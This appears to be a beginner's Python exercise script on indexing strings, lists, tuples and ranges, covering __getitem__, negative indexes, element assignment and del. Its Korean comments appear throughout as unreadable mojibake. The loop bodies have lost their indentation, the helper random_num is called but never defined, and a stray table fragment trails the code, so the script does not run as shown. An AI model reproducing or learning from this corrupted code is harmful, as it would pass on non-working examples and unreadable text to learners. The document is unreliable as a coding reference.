hello = 'hello world!'
print( hello[2] )
print( hello[5] ) # ๊ณต๋ฐฑ๋ ์ธ์
print('-'*20)
hello = list(hello) # ํ์ธ
print(hello)
print('-'*40)
# ์ํธ์ฆ ๊ฐ์ฒด์ ์ธ๋ฑ์ค๋ฅผ ์ง์ ํ์ง ์์ผ๋ฉด
# c๋ฅผ ์ด์ฉํด์ ํ์ธ
c = [ 38, 26, 53, 72, 19]
print(c) # c๋ฅผ ๊ทธ๋ฅ ๋ถ๋ฌ์ค๋๊ฒ => c์ ๋ด๊ธด ๋ฆฌ์คํธ ๋ด์ฉ์ ์ ๋ถ๋ฅผ ์ถ๋ ฅ
print('-'*40)
# __getitem__ ๋ฉ์๋
txt_getitem = """
# __getitem__ ๋ฉ์๋
์ํธ์ฆ ๊ฐ์ฒด์์ ๋๊ดํธ๋ฅผ ์ฌ์ฉํ๋ฉด
์ค์ ๋ก๋ __getitem__ ๋ฉ์๋๊ฐ ํธ์ถ๋์ด ์์๋ฅผ ๊ฐ์ ธ์ด
์ง์ ํธ์ถ๋ ๊ฐ๋ฅ
์ํธ์ค ๊ฐ์ฒด. __getitem__(index)
__getitem__๋ฉ์๋๋ฅผ ์ด์ฉํ ์ถ๊ฐ์ ์ธ ๊ฒ์
unit_39(์ดํฐ๋ ์ดํฐ)์์ ์ถ๊ฐ๋ก ์ค๋ช
์ผ๋จ ์๋์ __getitem__๋ฉ์๋๋ฅผ ์ด์ฉํด ํธ์ถ ํด๋ณด๊ฒ ์
"""
print(txt_getitem)
print('-'*40)
# __getitem__ ๋ฉ์๋ - ์ค์ต
a = list(range(10))
# print( a )
print(a.__getitem__(5))
print('-'*40)
# ์์ ์ธ๋ฑ์ค ์ง์ ํ๊ธฐ
# ๋ด๊ฐ ๋ง๋ ํจ์๋ก ์์ ์ซ์๋ฅผ ๊ฐ์ง๊ณ ์ค๋ ๊ฑฐ์
ran = random_num(5)
print(ran, ran[-2], ran[-1])
print('-'*40)
# ํํ๋ก ์ธ๋ฑ์ค ์ง์ ํ๊ธฐ
ran_1 = tuple(ran)
print(ran_1,ran_1[-3])
print('-'*40)
r = range(1,11,2)
print(r[-2])
print('-'*40)
hello = 'hello world!'
print(hello[-1])
print('-'*40)
# ์ธ๋ฑ์ค์ ๋ฒ์๋ฅผ ๋ฒ์ด ๋ ๋
# ์๋ฌ ๋จ => index error : list index out of range
# ๋ฆฌ์คํธ์ ์ธ๋ฑ์ค๊ฐ ๋ฒ์๋ฅผ ๋ฒ์ด๋์ ์๋ฌ ๋ฐ์
# ๋ง์ง๋ง ์์์ ์ ๊ทผํ๊ธฐ
a = random_num(10)
print(a,'\n ์์ ๊ธธ์ด : ', len(a),'\n ๋ง์ง๋ง์์ : ',a[len(a)-1])
# a[len(a)-1] ์ด๋ฐฉ๋ฒ์ ๋ง์ง๋ง ์ธ๋ฑ์ค๋ฅผ ๊ตฌํ ๋ ์ข
์ข
์ฌ์ฉ !
print('-'*40)
# ์์์ ๊ฐ ํ ๋นํ๊ธฐ
"""
- ์ํธ์ฆ ๊ฐ์ฒด[์ธํ
์ค] = ๊ฐ
"""
tmp = []
zro = [0] * 5
rdm_num = random_num(5)
print('rdm_num :',rdm_num)
# print(zro)
for i in range(len(zro)) :
# print('zro[%d] = ' % i, zro[i])
print(i)
for j in range(len(rdm_num)):
# print(rdm_num)
# dum = 0
pass
# print('test : rdm_num[%d] = ' % i, rdm_num[i])
# print('์ ์์๋')
zro[i] = rdm_num[i]
print('rdm_num[%d] = ' % i, rdm_num[i])
tmp.append(zro[i])
print('zro[i]๋ง ์ถ์ถ :', tmp)
print('tmp[0] : ', tmp[0])
print('tmp[4] : ', tmp[4])
print('-'*40)
# del๋ก ์์ ์ญ์ ํ๊ธฐ
"""
del ์ํธ์ฆ ๊ฐ์ฒด[์ธ๋ฑ์ค]
"""
print(tmp) # before
del tmp[2]
print(tmp) # after -> ์ญ์ ๋๊ฒ์ ํ์ธ ํ ์ ์์
print('-'*40)
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.